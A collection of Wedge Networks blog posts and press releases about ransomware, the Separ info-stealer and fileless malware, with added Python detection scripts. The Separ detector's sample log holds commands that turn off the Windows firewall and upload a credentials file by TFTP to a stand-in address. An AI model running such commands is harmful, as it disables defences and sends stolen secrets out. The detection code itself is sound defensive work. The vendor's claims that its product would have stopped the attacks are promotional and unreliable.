Talk with Wedge to Secure Your Smart Cities at the 2019 Smart City Summit and Expo in Taipei, Taiwan


March 26-29, 2019 – 2019 Smart City Summit and Expo – Nangang Exhibition Center – Hall 1, Taipei, TAIWAN – Wedge Networks will be participating at this event with The Canadian Trade Office in Taipei / Alberta Taiwan Office, Booth I-305. Wedge’s CEO & CTO, Dr. Hongwen Zhang, will be in attendance and will be presenting how Wedge is protecting Smart Cities. Please visit with Wedge’s team at the event! If you would like to request a meeting with Wedge’s CEO, please contact us.

Posted in Wedge Channel Partner Forum

Even With Adequate Backups in Place, Ransomware Hitting a Network Can Still Cause Disruptions and Have a Financial Impact


Ransomware is again in the news as of late; this time hitting one of the world’s largest aluminum producers, Norsk Hydro, in Norway.  As reported by Yahoo! Finance, Norsk Hydro was battling to contain a ransomware cyberattack yesterday that caused a halt in parts of its production.  Even with minimal internet exposure to its systems, the company had to shut several metal extrusion and rolled products plants while its giant smelters in Norway were reduced to operating on largely a manual basis.

Classifying it as a classic ransomware attack, the company’s CFO told a news conference that they had not identified the hackers and that the situation was quite severe. According to the Norwegian National Security Authority (NNSA), the attack used a virus known as LockerGoga, a relatively new strain of ransomware that encrypts computer files and demands payment.

Norsk Hydro has declined to say whether it would pay the hackers to unlock its systems, but has said that, because the company has good back-up systems, it plans to restore them from backup servers.

In this case, thankfully, Norsk Hydro had back-up systems that it could rely on to get the company running again. Unfortunately, many other companies are not so lucky and would be hard pressed to pay whatever ransom the hackers demand in order to get their information back and their systems up and running again. Norsk Hydro mentioned that the financial impact on the company has been limited so far and that any impact was mostly from direct labour: some of the activities that the company used computers for had to be switched to manual labour with more people added, on top of whatever downtime it experienced as a result of remediation efforts to get its systems back online. External to the company, however, as news of Norsk Hydro’s plant outages hit the market, it pushed aluminum prices to a three-month high on the London Metal Exchange, and the company’s shares fell as much as 3.4% before recovering a bit to trade 0.8% lower.

So, we see that even with good backups in place, the company still suffered downtime, an increase in labour cost and even a drop in share price. All of this could have been prevented had they enhanced their backup systems with a real-time malware prevention system such as Wedge’s Advanced Malware Blocker. Wedge is a major proponent of Detection and Blocking: stopping malware BEFORE it hits the network, instead of the current mentality of Detect and Remediate. We feel that once malware has hit the network, it is already too late and costly remediation efforts will be needed. With WedgeAMB’s orchestrated network security product, which enhances its Deep Content Inspection with an AI deep learning neural net trained to detect even never-before-seen malware, ransomware attacks such as the one that hit Norsk Hydro could be stopped in their tracks, in real-time. It is disheartening for us to keep hearing of ransomware attacks such as these still occurring, especially when we know that they could have been stopped by the WedgeAMB solution.

We continue to argue that prevention should be the cure instead of relying on detection and expensive remediation. Thankfully, many of our customers share this view and are protected by the WedgeAMB solution from exactly what Norsk Hydro had to experience. We are hoping that more will join the “Detect and Block” mentality.

To help organizations protect themselves, Wedge offers its Wedge Advanced Malware Blocker FREE for 90 days.  If you feel that your organization might be interested in and could benefit from a solution that can detect and block malware in real-time, please email our team at info@wedgenetworks.com.

Posted in Industry News, Latest Security News

Ryuk Ransomware – Still Netting CyberCriminals Payouts Through Attacks on Local Governments and Smaller Enterprises – So, What Should They Do?


Despite better security solutions now being available to combat ransomware, old and new strains are still being used to great effect. The latest report from Bleeping Computer focuses on the “Ryuk” ransomware, used by a group in Eastern Europe to attack municipalities in North America. Borrowing code from the previously seen “Hermes” malware, attributed to the North Korean hacker group Lazarus, the Ryuk strain is hitting smaller government offices, communities and enterprises quite successfully; in this case, Jackson County ended up having to pay them USD$400,000.

There is a reason hackers are hitting these municipalities and smaller offices. The effects of these ransomware attacks can be enormous, especially for government organizations; reducing activities to a crawl, wreaking havoc on government services, and still costing the organizations ransom in exchange for decryption keys. As noted in the article, Jackson County, Georgia was hit, forcing county offices to revert to paper to do their jobs, slowing operations to a snail’s pace.

Because the county did not have a backup system in place, it either had to take a huge operational hit and be offline for a long period, spending money to rebuild its networks and hopefully incorporating a much needed data backup policy and network security system, or it had to pay the $400,000 ransom, which it ended up doing.

Unfortunately, Jackson County was not the only victim of this new Ryuk ransomware. Major newspapers in the US, whose printing and delivery were greatly affected by attacks in December of 2018, were also not immune. A list of those hit include some major publications, such as the Wall Street Journal, New York Times, Los Angeles Times, Chicago Tribune and Baltimore Sun, to name a few.

However, Jackson County exemplifies the case of small organizations such as municipalities having to continually cut costs, to the extent that resources are always scarce. The question facing these CIOs is what sort of solutions can be put in place to combat these attacks and to ensure they will not be affected again.

Wedge’s position is that even if they had the resources to implement a proper data backup and maintenance program, these organizations need to put in place a real-time solution like Wedge Advanced Malware Blocker (WedgeAMB), where ransomware attacks can be detected and blocked before they have a chance to even enter the organizations’ networks. The reasoning is simple: ransomware’s approach today is to encrypt an organization’s resources, but it is easy to paint the picture that in the future, exfiltration of data OUTSIDE the organization is the next step of ransomware’s evolution. You heard it here first!

With its Deep Content Inspection technology combined with AI algorithms and multiple malware databases, WedgeAMB can see the content in real-time and block ANY content that is deemed malicious before it has a chance to do any damage. Having such a system in place would definitely have prevented attacks such as the ones perpetrated on Jackson County and the various newspapers.

So we argue that prevention could be the cure instead of relying on detection and expensive remediation. Out of our civic responsibility to our municipalities, Wedge is offering its Wedge Advanced Malware Blocker FREE for 90 days. Email our team at info@wedgenetworks.com to see how your organization could benefit from a solution that can make ransomware attacks obsolete!

Posted in Industry News, Latest Security News

Separ Malware – Showing That the Simple Attacks are Sometimes the Most Effective


Over the last week, more has been made public about the Separ Malware / phishing campaign that has been making the rounds, starting at the end of January.  Threatpost states that “it has affected around 200 companies and over 1,000 individuals, located mainly in Southeast Asia, the Middle East, and North America”.  The effectiveness of this malware has been a result of its use of a combination of legitimate executable files and short scripts, with no attempt by the attacker to evade analysis.

Separ’s earlier variants have existed since November 2017, with info-stealers such as this being active as far back as 2013, so this is not a new malware. What has allowed this attack to become so effective is that it is launched using legitimate files that are either common within the organizations being attacked or are widely-used administrative tools; these legitimate files and executables are abused to perform the malicious info-stealing that is the underlying goal.

The attack starts as a phishing email that contains the malicious attachment; often a self-extracting executable disguised as a PDF document related to normal business activities such as quotations, shipments, etc. Once clicked, the self-extractor runs a Visual Basic script that executes a list of short batch scripts with malicious functions, often masquerading as fake Adobe-related programs. Then it is off to the races, with the scripts changing firewall settings, stealing email and browser credentials, etc., and eventually using TFTP to upload the stolen data.

What makes this attack so successful is that it uses multiple vectors in launching its attack, many of which are not caught by the various malware solutions on the market because the malware uses legitimate executable files. Often, even the most up-to-date malware databases will not list these files. Thankfully, there are solutions out there, such as the Wedge Advanced Malware Blocker, with its Deep Content Inspection technology combined with AI algorithms, that can see the whole picture and piece together the multiple vectors of attack that this campaign uses. Using its deep learning AI engine, WedgeAMB can catch attacks such as these in their first phase of infection by looking at the various actions of the fake Adobe installer and seeing whether any malicious activity is occurring, even within a legitimate executable file.
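The post’s point is that each stage of the Separ chain looks legitimate on its own and only the combination gives it away. As an added illustration (this is not code from the original post or from Wedge), the script below correlates the stages described above across constructed process-creation log lines: a script host launching a firewall configuration change, followed on the same host by an outbound TFTP upload. The log format, the host names, the IP address and the rule thresholds are all assumptions made for this example; the tool names (netsh advfirewall, tftp.exe) are standard Windows utilities and are used here only as detection indicators.

```python
"""Correlating the stages of a Separ-style script-driven info-stealer.

Added example, not Wedge's code. Assumes a simplified, constructed
process-creation log format:
    <ISO time>|<host>|<parent image>|<image>|<command line>
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines: WS-17 shows the whole chain described in the
# post, WS-02 shows only a benign administrative query.
SAMPLE_LOG = """\
2019-02-20T09:01:11|WS-17|explorer.exe|quotation_0219.pdf.exe|"C:\\Users\\ann\\Downloads\\quotation_0219.pdf.exe"
2019-02-20T09:01:12|WS-17|quotation_0219.pdf.exe|wscript.exe|wscript.exe //B adobe_setup.vbs
2019-02-20T09:01:13|WS-17|wscript.exe|cmd.exe|cmd.exe /c adobel.bat
2019-02-20T09:01:14|WS-17|cmd.exe|netsh.exe|netsh advfirewall set allprofiles state off
2019-02-20T09:01:20|WS-17|cmd.exe|tftp.exe|tftp.exe -i 203.0.113.9 put C:\\Users\\ann\\AppData\\Local\\Temp\\creds.txt
2019-02-20T10:30:00|WS-02|cmd.exe|netsh.exe|netsh advfirewall show allprofiles
"""

# Interpreters the post describes as the launch point of the batch scripts.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe"}


def parse_line(line):
    """Split one constructed log line into its five fields."""
    ts, host, parent, image, cmdline = line.split("|", 4)
    return {"ts": datetime.fromisoformat(ts), "host": host,
            "parent": parent.lower(), "image": image.lower(), "cmdline": cmdline}


def classify(event):
    """Tag one event with the Separ-style stage(s) it resembles."""
    tags = set()
    cmd = event["cmdline"].lower()
    # Firewall *changes* are a stage of the chain; read-only queries are not.
    if (event["image"] == "netsh.exe" and "advfirewall" in cmd
            and any(verb in cmd for verb in (" set ", " add rule", " delete rule"))):
        tags.add("firewall_change")
    # The post notes the stolen data is uploaded with TFTP.
    if event["image"] == "tftp.exe" and " put " in cmd:
        tags.add("tftp_upload")
    if tags and event["parent"] in SCRIPT_HOSTS:
        tags.add("script_driven")  # stage was launched from a script host
    return tags


def correlate(lines, window=timedelta(minutes=10)):
    """Group tagged events per host and flag hosts where a firewall change is
    followed by a TFTP upload within `window` (assumed threshold)."""
    per_host = defaultdict(lambda: {"tags": set(), "events": [], "chain": False})
    for line in lines:
        if not line.strip():
            continue
        ev = parse_line(line)
        tags = classify(ev)
        if tags:
            rec = per_host[ev["host"]]
            rec["tags"] |= tags
            rec["events"].append((ev["ts"], tags))
    for rec in per_host.values():
        fw = [ts for ts, t in rec["events"] if "firewall_change" in t]
        up = [ts for ts, t in rec["events"] if "tftp_upload" in t]
        rec["chain"] = any(timedelta(0) <= (u - f) <= window for f in fw for u in up)
    return dict(per_host)


if __name__ == "__main__":
    for host, rec in correlate(SAMPLE_LOG.splitlines()).items():
        print(host, sorted(rec["tags"]), "CHAIN" if rec["chain"] else "isolated")
```

Only the host that shows both stages in order is escalated; a lone `netsh advfirewall show` produces no finding at all, which is the behaviour a defender wants from a rule built on legitimate tools.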

Unlike many other solutions on the market, WedgeAMB is able to reassemble all content in the network stream in real-time and block such content if its intent is malicious. This provides a clear advantage, especially when attacks such as Separ are utilizing multiple vectors, many of which might be within legitimate files and executables.

With Separ and other similar attacks on the horizon, organizations should really take a look at solutions that can “see” the whole picture and stop malicious activities in real-time before they can do any damage within their networks.  If you have such Separ problems and are committed to building an infrastructure that can withstand such attacks, why don’t you e-mail us at info@wedgenetworks.com. Our great team of engineers would be very willing to help!

Posted in Industry News, Latest Security News, Wedge BeSecure Community Support Forum

Responding to the Need by MSSPs for a Next Generation Secure Web Gateway, Wedge Announces the Release of its Wedge Intelligent Web Shield™


Mobile World Congress, Barcelona, Spain – February 25th, 2019 – In response to MSSPs’ need for in-depth monitoring and visibility, advanced threat detection, and support for mobile/remote office users, Wedge Networks, the global leader in Orchestrated Real-time Threat Prevention, is pleased to announce the release of its Wedge Intelligent Web Shield™ (WedgeIWS™) product under its Wedge Absolute Real-time Protection series.

By adding improved visibility into all layers of network traffic, real-time detection and blocking of advanced threats, and versatile form factors of VM, appliance, or cloud; WedgeIWS™ brings many features that improve on the traditional Secure Web Gateway products currently in the market. According to industry research firm Gartner, in their December 2018 “Critical Capabilities for Secure Web Gateways” publication, “The three primary use cases for secure web gateways (SWGs) are monitoring and visibility (for example, observing user behavior on the internet), advanced threat defense, and protecting remote offices and mobile workers.” WedgeIWS™, part of the Wedge Absolute Real-time Protection product line, with its Deep Content Inspection technology, deep learning AI-based real-time malware detection and blocking, best-of-breed web security intelligence, and flexible deployment and management capabilities, provides a strong solution in the market for all these use cases.

“Managing web security in a cloud connected, service centric era is a very challenging task, not only for SMEs, but also for government and large enterprises. MSSPs are playing an important role in ensuring safe and secure internet usage. They are asking for solutions that can be readily inserted into the newer network topologies such as high-speed 5G mobile networks, IoT networks, SDN, SD-WAN, and asymmetric multi-datacenter networks. Current generation SWGs are having a tough time keeping pace with this trend. The industry has been looking for an upgraded SWG product that can solve these problems,” said Dr. Hongwen Zhang, CEO & CTO, Wedge Networks.

“We have been using products powered by Wedge’s network security platform for a number of years to provide robust managed security services to our diverse end-customers. The products’ ease of use and Wedge’s exemplary support made that possible. By adding advanced SWG services to the platform, Wedge now gives MSSPs, such as ours, the added edge we need both to provide unparalleled real-time malware prevention and to offer these services in our clients’ ever-changing computing infrastructure,” stated Dave Hodkinson, Managing Director, Spectrum Computer Solutions, UK. “With WedgeIWS™, MSSPs can deliver to their customers effective and differentiated managed security service to ensure safe and secure computing.”

The WedgeIWS product provides the deepest visibility into network activities with its patented Deep Content Inspection. This serves as a linchpin to insightful, actionable security analytics for its users. As well, with multiple signature and heuristics-based scanning engines, greatly enhanced with an embedded deep-learning neural network and robust services orchestration, Wedge’s new product is an effective managed network security platform for all MSSPs.

About Wedge Networks
Based in Calgary, Canada, Wedge Networks develops cyber security software/solutions for the cloud connected world. The company is focused on providing real-time prevention against advanced threats at the network layer; currently securing nearly 100M endpoints in data/cloud centers across the globe. It sells its products through partners such as VAD/VAR/MSSP/MDR.

Recognized by leading industry experts as a leader in Orchestrated Threat Management, Wedge uses a patented deep content inspection technology to gain deep insights to network application data (MIME objects) for web, email, and data transmissions in high bandwidth/low latency networks that are typical of data/cloud centers. Its platform orchestrates a rich set of security Virtual Network Functions (VNF), including a well-trained Deep Learning Artificial Neural Network to detect and prevent advanced threats from entering the enterprise networks. All these advanced features are packaged as Wedge Absolute Real-time Protection (WedgeARP) and are delivered in VMs, cloud instances, or server appliances. The ability to provide real-time, high efficacy threat prevention with a software-based orchestration architecture makes WedgeARP a tool-of-choice for MSSP/MDR partners to serve their enterprise customers.

For more information on Wedge Networks, visit http://www.wedgenetworks.com/

Media Contacts:
Please forward any media or PR inquiries to: PR@wedgenetworks.com

Posted in Industry News, Latest Security News, Product and Services Updates, Wedge Channel Partner Forum, Wedge News

Android App Store and the Growing Threat to Mobile Devices and the IoT


As the popularity of the Android OS grows, powering not only phones but increasingly tablets, TV boxes, and a host of other IoT devices, its rapidly increasing install base becomes a double-edged sword. The Android platform has become quite ubiquitous globally, but, as a result, it has also become a magnet for malware developers and those bad actors and hackers who are keen on breaching its App store security in order to gain access to personal information, to execute phishing attacks and, in general, to cause headaches for users. This is also why it came as no surprise when an article showed up a couple of days ago on SlashGear highlighting that a number of Google Play Store apps, downloaded by users over 4 million times, were found to be rife with malware and phishing scams built into them.

In this case, almost 30 Android apps found on the Play Store were found to be using a number of malicious tactics such as making it difficult for users to uninstall, displaying full-screen pop-up ads that linked to explicit content, downloading a paid media player, collecting personal information like addresses and phone numbers, along with containing embedded malware and executing phishing scams.

Mobile devices have always been more susceptible to security attacks due to their lower powered computing nature and the inability, or unwillingness, of users to run endpoint protection in order to save battery life. This is being compounded by the increasing number of IoT devices that are now connecting to the cloud with the same level of computing power as mobile devices and the same inability to protect themselves.

With the increased risk, how do we ensure data security for mobile phones and safety for IoT devices on such an omnipresent platform?  That is where the likes of Wedge Networks comes in.  One of the key values that Wedge products offer is the ability to protect heterogeneous computing devices (those with a wide variety of different operating systems), detecting and blocking malware, zero days and APTs in the service provider networks and data centers, in real-time before they hit these devices.  

Wedge has been developing deep-learning based antimalware for heterogeneous computing devices such as Windows, Unix/Linux, Android, iOS, etc. It has been working with world leading threat intelligence OEM partners and universities in developing and embedding advanced real-time malware detection and blocking in its products. The security case of the Google Play store tells us that such an ability to ensure security and safety for mobile/IoT devices is critical.

Posted in Industry News, Latest Security News, Wedge News

Catering to Increased Demand from Customers, Wedge Networks Announces Additional Bandwidth Options for its Wedge Absolute Real-time Protection™ Series of Products


CALGARY, Canada – January 31st, 2019 – As a result of ongoing customer and partner demands and requests, Wedge Networks, the leader in orchestrated real-time threat prevention, is pleased to announce the addition of new bandwidth offerings for its Wedge Absolute Real-time Protection™ (WedgeARP™) series of products.

Starting immediately, Wedge is offering its WedgeARP™ product family in the following bandwidths: 250 Mbps, 500 Mbps, 2.5 Gbps and 5 Gbps. These enhance the previously offered 100 Mbps, 1 Gbps and 10 Gbps products and provide increased choice for those customers whose networks fall between the previous bandwidth offerings. As with the previous offerings, the new bandwidths will all be available for purchase as an appliance, with associated software, and via VM deployment options and bundles.

Wedge’s enhanced functionality and offerings will provide greater choice and more deployment flexibility with its WedgeARP™ products, providing much needed options for those organizations whose multiple deployment locations require different bandwidth services. This also enables Wedge partners to offer more tailored packages that will better serve their customers’ network and budgetary constraints.

“At Wedge Networks, we work closely with our partners and customers to understand their organization’s product and business requirements,” said Mr. Steve Chappell, Wedge’s EVP of Global Sales. “We were continually being requested to provide additional bandwidth options for the very diverse customer networks that we are deploying into. These new bandwidth levels and associated products will provide much needed flexibility from the network deployment side as well as strengthen the business case for those organizations that needed more granular pricing.”

About Wedge Networks
Based in Calgary, Canada, Wedge Networks develops cyber security software/solutions for the cloud connected world. The company is focused on providing real-time prevention against advanced threats at the network layer; currently securing nearly 100M endpoints in data/cloud centers across the globe. It sells its products through partners such as VAD/VAR/MSSP/MDR.

Awarded a 2016 Gartner Cool vendor designation, Wedge uses a patented deep content inspection technology to gain deep insights to network application data (MIME objects) for web, email, and data transmissions in high bandwidth/low latency networks that are typical of data/cloud centers. Its platform orchestrates a rich set of security Virtual Network Functions (VNF), including a well-trained Deep Learning Artificial Neural Network to detect and prevent advanced threats from entering the enterprise networks. All these advanced features are packaged as Wedge Absolute Real-time Protection™ (WedgeARP™) and are delivered in VMs, cloud instances, or server appliances. The ability to provide real-time, high efficacy threat prevention with a software-based orchestration architecture makes WedgeARP™ a tool-of-choice for MSSP/MDR partners to serve their enterprise customers.

For more information on Wedge Networks, visit http://www.wedgenetworks.com/

Media Contacts:
Please forward any media or PR inquiries to: PR@wedgenetworks.com

Posted in Industry News, Latest Security News, Product and Services Updates, Wedge Channel Partner Forum

Citing Rapid Growth and Expansion Opportunities, Wedge Networks Announces Addition of Regional Sales Director to Support Korean and Japanese Markets


CALGARY, Canada – January 1st, 2019 – With rapidly growing interest in the global marketplace for real-time malware prevention products, Wedge Networks has added a new regional director of sales for Korea and Japan, based out of South Korea, to help support increased sales within these markets. Mr. MC Kim will be joining Wedge, effective immediately, and provides additional regional support for the expanding business opportunities and strong growth that Wedge is seeing.

After graduating with a Master’s Degree in Electronic Engineering from Chung-Ang University, Mr. Kim has been working in the Computer Networking and Security Industry in Korea and APAC, and brings over 29 years of experience in the Enterprise, Government and Telecoms market, covering a wide variety of responsibilities. Prior to joining Wedge Networks, Mr. Kim was head of APAC sales and field operations at HFR, Inc., headquartered in Seoul, South Korea. Other positions held include being the Korean Country Manager for Cyan, Inc., and Irdeto, as well as acting as Regional Sales Director, North APAC, for Bigband Networks. Mr. Kim has also worked at Caspian Networks in Korea and was a sales executive at both Nortel and Newbridge Networks.

“We are excited to welcome Mr. MC Kim to join Wedge Networks’ rapidly growing sales organization. With his dedication and experience we will be able to better serve our expanding customer base in the South Korean and Japanese markets. The Wedge team is looking forward to working with Mr. Kim,” said Mr. Steve Chappell, Wedge’s EVP of Global Sales.

About Wedge Networks
Based in Calgary, Canada, Wedge Networks develops cyber security software/solutions for the cloud connected world. The company is focused on providing real-time prevention against advanced threats at the network layer; currently securing nearly 100M endpoints in data/cloud centers across the globe. It sells its products through partners such as VAD/VAR/MSSP/MDR.

Awarded a 2016 Gartner Cool vendor designation, Wedge uses a patented deep content inspection technology to gain deep insights to network application data (MIME objects) for web, email, and data transmissions in high bandwidth/low latency networks that are typical of data/cloud centers. Its platform orchestrates a rich set of security Virtual Network Functions (VNF), including a well-trained Deep Learning Artificial Neural Network to detect and prevent advanced threats from entering the enterprise networks. All these advanced features are packaged as Wedge Absolute Real-time Protection (WedgeARP) and are delivered in VMs, cloud instances, or server appliances. The ability to provide real-time, high efficacy threat prevention with a software-based orchestration architecture makes WedgeARP a tool-of-choice for MSSP/MDR partners to serve their enterprise customers.

For more information on Wedge Networks, visit http://www.wedgenetworks.com/

Media Contacts:
Please forward any media or PR inquiries to: PR@wedgenetworks.com

Posted in Wedge Channel Partner Forum, Wedge News

How Wedge Can Prevent Your Organization From Becoming a Statistic

Statistics Canada (StatsCan) published a very telling statistic yesterday, as shown in a Globe and Mail news item stating that more than 1 in 5 Canadian businesses were hit by cyberattacks last year. The survey went on to report that businesses spent $14 Billion on cybersecurity as they confronted the growing risks in the digital world. The most common motive for cyberattacks was an attempt to steal money or to demand a ransom payment, with theft of personal or financial information being less typical. Although theft of information accounted for less than one quarter of cyberattacks, it was the most cited reason for investing in cybersecurity, StatsCan noted.

According to the agency, as Canadian businesses continue to embrace the internet and digital technologies, they are exposed to greater cybersecurity risks and threats, while the impact of these risks and threats on the investment and day-to-day decisions of the businesses is not easily understood and cybersecurity incidents often go unreported. According to StatsCan, only 10% of businesses affected by cyberattacks reported them to law enforcement agencies!

This is all about to change for Canadian businesses as of November 1st, 2018, as key provisions of the federal Digital Privacy Act come into effect, requiring companies to tell Canadian consumers when their personal information has been breached. In addition, these companies could face steep fines for violating these provisions. Although Canadian companies shelled out over $14 Billion in 2017 on cybersecurity staff and contractors, related software and hardware, and prevention and recovery measures, this accounted for only one percent of their total revenues.

Based on the StatsCan findings, it is expected that spending will most likely increase as companies shore up their cybersecurity defences. Companies will be looking for something that can not only help defend against these growing attacks but will be needing tools that can garner them much more insight into what is going on in their networks. As we see more and more breaches being announced in the news that have affected larger corporations such as banks, airlines, service providers and other retailers (see such examples as CIBC, Equifax, British Airways, Deloitte, Uber, Walmart), companies of all sizes will be looking for tools that can provide them with absolute real-time prevention against the ever-changing Advanced Threats.

This is where Wedge can help. With its Wedge Absolute Real-time Prevention (WedgeARP) solution, it is able to help protect organizations of all sizes through the orchestration of best-of-breed security algorithms and intelligence, providing advanced cyber protection, in real-time, against new and unknown malware and APTs. All of this is provided in an easy-to-manage product package that can be managed by a corporate IT department or through an MSSP. Utilizing machine learning and advanced analytics, WedgeARP can offer the critical protection as well as network insight needed by organizations in the changing regulatory environment, providing the extra layer of “insurance” that Canadian businesses will need to prevent themselves from becoming one of the growing breach statistics tracked by StatsCan!

Posted in Industry News, Latest Security News, Wedge News

How Does Wedge Deal With Fileless Malware Hitting Windows 10?

Fileless Malware on Windows 10 has become a hot topic as of late due to its potential for affecting millions of enterprise customers using Windows 10 around the world. It poses a real danger to these customers, compromising their system security by executing code without a file being written to disk. As such, the question was recently put to our tech gurus here at Wedge: how do we deal with the recent spate of Fileless Malware that has hit Windows 10?

To start, what is “Fileless Malware”? This is a marketing term used by certain vendors that typically refers to two types of attacks:

1. Malicious activities carried out by the macros of Windows documents that are only executed in memory.

2. Hackers exploiting known vulnerabilities using network intrusion techniques.

In a ZDNet article that was published today, Microsoft states that it has been working on an answer to some new techniques used in penetration-testing kits to bypass its Windows Defender Advanced Threat Protection (ATP), Microsoft’s key security platform for protecting Windows 10 in the enterprise. Microsoft reported that it had detected two instances of Fileless Malware being used to deliver information stealers that run in memory without an executable file being written to disk. The malware that Microsoft detected relies on techniques from the penetration-testing toolkit Sharpshooter, which generates payloads in multiple Windows formats that can avoid detection by enterprise anti-malware products. You can read more about how Microsoft tries to stop this Fileless Malware in the ZDNet article.

As for how Wedge deals with this problem: instead of trying to detect this type of malware the way Microsoft is attempting to (a detection algorithm based on runtime activity that leverages AMSI support in scripting engines, AMSI being Microsoft’s interface for anti-malware products including Windows Defender, targeting generic malicious behaviour and a fingerprint of the fileless technique), Wedge works at the network layer and views the content as a whole, providing an extra layer of protection that enhances what Microsoft is doing with its endpoint protection. In those cases where Windows Defender is not deployed, or even where the endpoint is using an operating system other than Windows 10, WedgeARP AMB, installed at the network layer, would still provide protection against Fileless Malware! For the two types of attacks listed above:

1. If the malicious code is actually in the macro, it would be stopped by WedgeARP AMB defences when the document passes through, thanks to the advanced detection and blocking heuristics and the state-of-the-art machine learning that make up the WedgeARP system. If the macro does not contain malicious code but simply triggers a download of other malware, WedgeARP would also detect this activity and the downloaded malware would be stopped.

2. As for hackers exploiting known vulnerabilities using network intrusion techniques, these activities would be immediately stopped by the IPS layer of the WedgeARP AMB solution.
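Case 1 above rests on the document being inspected as content while it crosses the network, before any macro ever runs on the endpoint. As an added illustration (not code from the original post or from Wedge), the script below performs the most basic such check on an OOXML (Word) package reassembled from a stream: does the package carry a VBA project part, does its declared content type say it is macro-enabled, and does the file name it was delivered under match what the bytes actually are. The sample documents are minimal packages constructed in memory, not real Word files; the `verdict` policy (block any macro-bearing document, review a name/content mismatch) is an assumption made for this example rather than a statement of any product’s behaviour.

```python
"""Network-layer content check for a VBA project inside an Office document.

Added example, not Wedge's code. The packages built here are constructed
samples; only the standard OOXML part names and content types are real.
"""
import io
import zipfile

MACRO_PART = "word/vbaProject.bin"
MACRO_MAIN_CT = "application/vnd.ms-word.document.macroEnabled.main+xml"
PLAIN_MAIN_CT = ("application/vnd.openxmlformats-officedocument"
                 ".wordprocessingml.document.main+xml")
WORD_EXTENSIONS = (".docx", ".docm", ".dotx", ".dotm")


def build_docx(with_macro):
    """Construct a minimal OOXML package in memory (constructed sample)."""
    main_ct = MACRO_MAIN_CT if with_macro else PLAIN_MAIN_CT
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        f'<Override PartName="/word/document.xml" ContentType="{main_ct}"/>'
        + ('<Override PartName="/word/vbaProject.bin" '
           'ContentType="application/vnd.ms-office.vbaProject"/>' if with_macro else "")
        + "</Types>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            # Placeholder bytes standing in for a real OLE-compound VBA project.
            z.writestr(MACRO_PART, b"\xd0\xcf\x11\xe0" + b"\x00" * 60)
    return buf.getvalue()


def inspect_office_document(data, claimed_name):
    """Inspect reassembled bytes without opening them in Office.

    Returns flags describing what the package really contains and whether
    that agrees with the name it was delivered under."""
    result = {"is_ooxml": False, "has_vba": False,
              "macro_content_type": False, "name_mismatch": False}
    if not data.startswith(b"PK"):          # not a ZIP container at all
        return result
    try:
        z = zipfile.ZipFile(io.BytesIO(data))
        names = set(z.namelist())
        ctypes = z.read("[Content_Types].xml").decode("utf-8", "replace")
    except (zipfile.BadZipFile, KeyError):
        return result
    result["is_ooxml"] = True
    result["has_vba"] = MACRO_PART in names
    result["macro_content_type"] = MACRO_MAIN_CT in ctypes
    # The bytes say "Word package" but the name says something else
    # (e.g. "quotation.pdf"): the content, not the extension, decides.
    result["name_mismatch"] = not claimed_name.lower().endswith(WORD_EXTENSIONS)
    return result


def verdict(result):
    """Example policy (an assumption of this example, not a product setting)."""
    if result["has_vba"] or result["macro_content_type"]:
        return "block"
    if result["is_ooxml"] and result["name_mismatch"]:
        return "review"
    return "allow"


if __name__ == "__main__":
    for name, doc in (("invoice.docm", build_docx(True)),
                      ("invoice.docx", build_docx(False)),
                      ("quotation.pdf", build_docx(True))):
        r = inspect_office_document(doc, name)
        print(name, r, "->", verdict(r))
```

The check never executes or even parses the macro; it only needs the package structure, which is exactly what a network-layer inspector has in hand once the stream is reassembled. Behavioural analysis of what the macro does (the heuristics and machine learning the post refers to) would sit after this gate, not instead of it.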

So, in conclusion, with any of these cases, enterprise customers can feel safe if WedgeARP AMB is deployed by their organization to protect their endpoints; Fileless Malware attacks on these protected endpoints would be stopped in their tracks.

Posted in Industry News, Latest Security News, Wedge News